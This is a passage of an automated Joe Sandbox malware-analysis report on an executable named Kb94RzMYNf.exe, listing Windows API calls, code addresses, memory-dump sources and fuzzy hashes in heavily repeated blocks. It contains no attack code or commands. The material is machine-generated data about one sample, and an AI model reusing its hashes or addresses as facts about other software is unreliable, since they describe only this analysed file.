                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2896919175-0
                                                                                                                                                              • Opcode ID: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
                                                                                                                                                              • Instruction ID: 7e99d7d4fb8bb12c566fb67139ae5e5ce66cf86df35e622ac950679830b3b0b7
                                                                                                                                                              • Opcode Fuzzy Hash: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
                                                                                                                                                              • Instruction Fuzzy Hash: CAF0B4765006008BE3416794AD05B977764EFD4314F19407EEF84B62E1DB795C418F5D
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                                                                                • Part of subcall function 004063BA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                                                                                                • Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
                                                                                                                                                                • Part of subcall function 004063BA: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406420
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                                              • Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                                                                                              • Instruction ID: 08b0c8f2ef2dcefd2b61a20e7fd6ba3d75d00ffdaa245a95e4079d340ab3ded5
                                                                                                                                                              • Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                                                                                              • Instruction Fuzzy Hash: D2E0863260462056D25197745E4493773AD9E99744302043EFA46F2080DB789C329B6E
                                                                                                                                                              APIs
                                                                                                                                                              • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$EnableShow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1136574915-0
                                                                                                                                                              • Opcode ID: e82e6f1ee631e9591c04bcc807b45cf067b06efe57e1aced68e9ea86292db559
                                                                                                                                                              • Instruction ID: 183564fed45e15aac194635682d2540e1570045d11d23ff7c62c61356a4b5cad
                                                                                                                                                              • Opcode Fuzzy Hash: e82e6f1ee631e9591c04bcc807b45cf067b06efe57e1aced68e9ea86292db559
                                                                                                                                                              • Instruction Fuzzy Hash: 92E0C2326005009FDB10AFF5AE4999D3375DF90369710007FE402F10E1CABC9C40CA2D
                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Kb94RzMYNf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405C29
                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405C4B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                              • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                                              • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                                                                              • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                                              • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C19
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                              • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                                              • Instruction ID: cd99531f96ac703a51573f19c9b8cc9de44b2267bcc9c0d579c2fc711e4bd44e
                                                                                                                                                              • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                                              • Instruction Fuzzy Hash: 3AD0C972504520ABC2102738AE0889BBB55EB952717024B39FAA9A22B0CB304C568A98
                                                                                                                                                              APIs
                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040570F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                              • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                                              • Instruction ID: e63be1853aafe68c2793134b37a867bebc3d2beebaf226ad42ac31f610d1a78e
                                                                                                                                                              • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                                              • Instruction Fuzzy Hash: 7CC04C30225602DBDA105B60DE087177A94AB90741F118439A146E21A0DA348415ED2D
                                                                                                                                                              APIs
                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileStringWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 390214022-0
                                                                                                                                                              • Opcode ID: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                                                                                              • Instruction ID: a822d11f1d05533bca3208a69e79300e3559a9020bae074bf72d5f6ed1f8f9d7
                                                                                                                                                              • Opcode Fuzzy Hash: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                                                                                              • Instruction Fuzzy Hash: BCE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                                                              APIs
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A00,000000FF,00416A00,000000FF,000000FF,00000004,00000000), ref: 00405CEB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                              • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                                              • Instruction ID: cd54f3301e23830850d9ea58ef2d9b6b3716dac1cb42590a0fcdec79a0e610d3
                                                                                                                                                              • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                                              • Instruction Fuzzy Hash: 77E0EC3221425EABDF109E959C04EEB7B6CEB05360F048437FD16E2150D631E921ABA8
                                                                                                                                                              APIs
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CBC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                              • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                                                                                              • Instruction ID: ab2ba72c7da8d0590a5026c7b9f2a747677d692c160b15db9e96a66b9068c41a
                                                                                                                                                              • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                                                                                              • Instruction Fuzzy Hash: 01E0EC3221425AABEF109E659C04EEB7B6CEB15361F104437F915F6150E631E861ABB4
                                                                                                                                                              APIs
                                                                                                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                              • Opcode ID: 62695d5c8c86e882195e65ce0f7765e430518bd8f6887f1e42abcc260ebb5c8d
                                                                                                                                                              • Instruction ID: 76e81b74098be2a3706baaa1e1a2527734eadd1478321fb398c06c814fc07831
                                                                                                                                                              • Opcode Fuzzy Hash: 62695d5c8c86e882195e65ce0f7765e430518bd8f6887f1e42abcc260ebb5c8d
                                                                                                                                                              • Instruction Fuzzy Hash: B5D05E33B05100DBDB10DFE8AE08ADD77B5AB80338B24817BE601F21E4D6B8C6509B1D
                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageW.USER32(00010476,00000000,00000000,00000000), ref: 00404172
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                              • Opcode ID: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                                                                                                                              • Instruction ID: c65f6eba747e04129790f2b1b21bae9375029ebd28d99582ecd6e8b4464eea9f
                                                                                                                                                              • Opcode Fuzzy Hash: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                                                                                                                              • Instruction Fuzzy Hash: 56C09B717447007BDA119F609D4DF1777646764702F1544797344F51D0C774D450D61C
                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                              • Opcode ID: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                                                                                              • Instruction ID: 10f0f1b1c79289e67bc844ccbe5aec3c597dbf8b190d8890215e27c6ac549869
                                                                                                                                                              • Opcode Fuzzy Hash: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                                                                                              • Instruction Fuzzy Hash: 27B0123A180A00BBDE118B00EE0AF857E62F7AC701F018438B340250F0CAF300E0DB08
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00403266
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
